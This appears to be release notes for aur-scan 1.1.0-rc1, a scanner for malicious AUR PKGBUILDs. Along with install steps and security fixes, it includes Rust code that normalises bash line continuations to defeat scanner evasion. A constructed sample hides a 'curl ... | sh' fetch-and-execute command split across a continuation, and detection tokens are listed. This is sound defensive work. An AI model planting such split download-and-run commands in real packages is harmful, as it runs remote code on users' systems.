aur-scan 1.1.0-rc1 (release candidate)
Pre-release
Security-hardening release candidate. Test it before it's promoted to stable.
Install (opt-in RC channel)

```sh
gpg --recv-keys 25631EAE3F43999050B7D7021132BF893C33FB51 # one-time, if your helper doesn't auto-fetch
paru -S aur-scanner-rc # or: yay -S aur-scanner-rc
```

aur-scanner-rc builds this GPG-signed tag and conflicts with the stable aur-scanner — install only one. Production systems should stay on aur-scanner.
AUR channels

| Package | Channel |
|---|---|
| aur-scanner / ks-aur-scanner | Stable (recommended) |
| aur-scanner-rc | Release candidate (this build) |
| aur-scanner-git | Rolling (latest commit) |
⚠️ Behavior changes

- Fails closed. The paru/yay wrapper and the pacman hook now deny on a scan/fetch error, a timeout, or a non-interactive (no-TTY) prompt instead of proceeding. If you drive an AUR helper from scripts/cron/CI, an install that can't be fully analyzed is refused rather than silently allowed.
- `scan --format json/sarif` emits only the machine document on stdout; the human summary moved to stderr (so `aur-scan scan --format json | jq` works).
Security

- Input-validation chokepoint for package names/bases.
- Network hardening: redirects refused, HTTPS-only, size-capped bodies, percent-encoded RPC URLs.
- The pacman hook drops root before reading user caches and refuses symlinked PKGBUILDs.
- Detection-evasion fixes: line-continuation splicing, quote/comment-aware brace scanning, broadened reverse-shell and crypto-address detection, checksum SKIP-laundering.
- bytes bumped to 1.11.1 (RUSTSEC-2026-0007).
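To illustrate why the line-continuation and quote/comment-aware fixes matter, here is an added example (not aur-scan's own code) of normalising a PKGBUILD the way bash's reader does before matching tokens; the function names and the constructed PKGBUILD snippet are assumptions for the demonstration.

```rust
/// Rebuild the text as bash's reader sees it: an unquoted `\` directly followed
/// by a newline is a line continuation and both characters disappear. Inside
/// single quotes the backslash is literal, and a comment ends at its newline, so nothing is spliced there.
pub fn splice_continuations(src: &str) -> String {
    let mut out = String::with_capacity(src.len());
    let mut it = src.chars().peekable();
    let (mut in_single, mut in_double, mut in_comment) = (false, false, false);
    let mut word_start = true; // `#` opens a comment only at a token boundary
    while let Some(c) = it.next() {
        if in_comment {
            out.push(c);
            if c == '\n' { in_comment = false; word_start = true; }
            continue;
        }
        match c {
            '\'' if !in_double => { in_single = !in_single; out.push(c); word_start = false; }
            '"' if !in_single => { in_double = !in_double; out.push(c); word_start = false; }
            '\\' if !in_single => {
                match it.peek().copied() {
                    Some('\n') => { it.next(); }                        // continuation: drop both
                    Some(n) => { out.push(c); out.push(n); it.next(); } // escaped char stays as-is
                    None => out.push(c),
                }
                word_start = false;
            }
            '#' if !in_single && !in_double && word_start => { in_comment = true; out.push(c); }
            _ => { out.push(c); word_start = c.is_whitespace(); }
        }
    }
    out
}

/// A line-by-line scan, the kind a continuation split defeats.
pub fn naive_line_scan(src: &str, token: &str) -> bool {
    src.lines().any(|l| l.contains(token))
}

/// Tokens present once the snippet is normalised the way the shell would read it.
pub fn find_tokens(src: &str, tokens: &[&str]) -> Vec<String> {
    let norm = splice_continuations(src);
    tokens.iter().filter(|t| norm.contains(**t)).map(|t| (*t).to_string()).collect()
}

/// Constructed sample, not a real AUR package: the download command is split across a
/// continuation, while the single-quoted copy is literal text the shell never runs.
pub const SAMPLE: &str = "package() {\n  cu\\\nrl -s https://example.invalid/p | sh\n  echo 'cu\\\nrl'   # not a command\n}\n";

fn main() {
    println!("naive per-line scan sees curl: {}", naive_line_scan(SAMPLE, "curl")); // false
    println!("after splicing: {:?}", find_tokens(SAMPLE, &["curl", "| sh"]));      // ["curl", "| sh"]
}
```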